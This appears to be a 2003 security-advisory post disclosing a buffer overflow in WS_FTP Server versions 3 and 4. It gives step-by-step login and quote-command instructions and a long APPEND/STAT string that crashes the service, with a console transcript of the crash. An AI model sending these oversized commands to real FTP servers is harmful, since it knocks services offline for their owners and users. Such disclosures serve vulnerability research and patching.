Remote and Local Vulnerabilities In WS_FTP Server
hi dear
i am pejman.d ,i finded the new bug in ws_ftp server
Vulnerable Systems : ws_ftp server 4,3
the bug is buffer overflow in ftp command service stop and some error
step by step buffer overflow :
1- login to ftp server by any username and password
2- use the quote command for send the command to server
3- you can use status or append or some command
4- after command 250 character for overflow : status 255x[A] or
append 255x[A]and other command
quote
Command line to send
APPEND aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
SAMPLE :
C:\Program Files\NuMega\SoftIceNT>ftp 81.93.35.60
Connected to 81.93.35.60.
220-pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
220-Wed Sep 03 23:58:59 2003
220-29 days remaining on evaluation.
220 pejman.pardaz.net X2 WS_FTP Server 4.0.1.EVAL (2024164574)
User (81.93.35.60:(none)): pejman
331 Password required
Password:
230 user logged in
ftp> quote
Command line to send stat
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Connection closed by remote host.
ftp>
ftp server is stop and all connection is refused !!!
it's work at ver 3,4 and test on the windows 2000 advance and prof with
sp4
i u need the additional information send mail to pejman@xxxxxxx
pejman.d (deject hacker )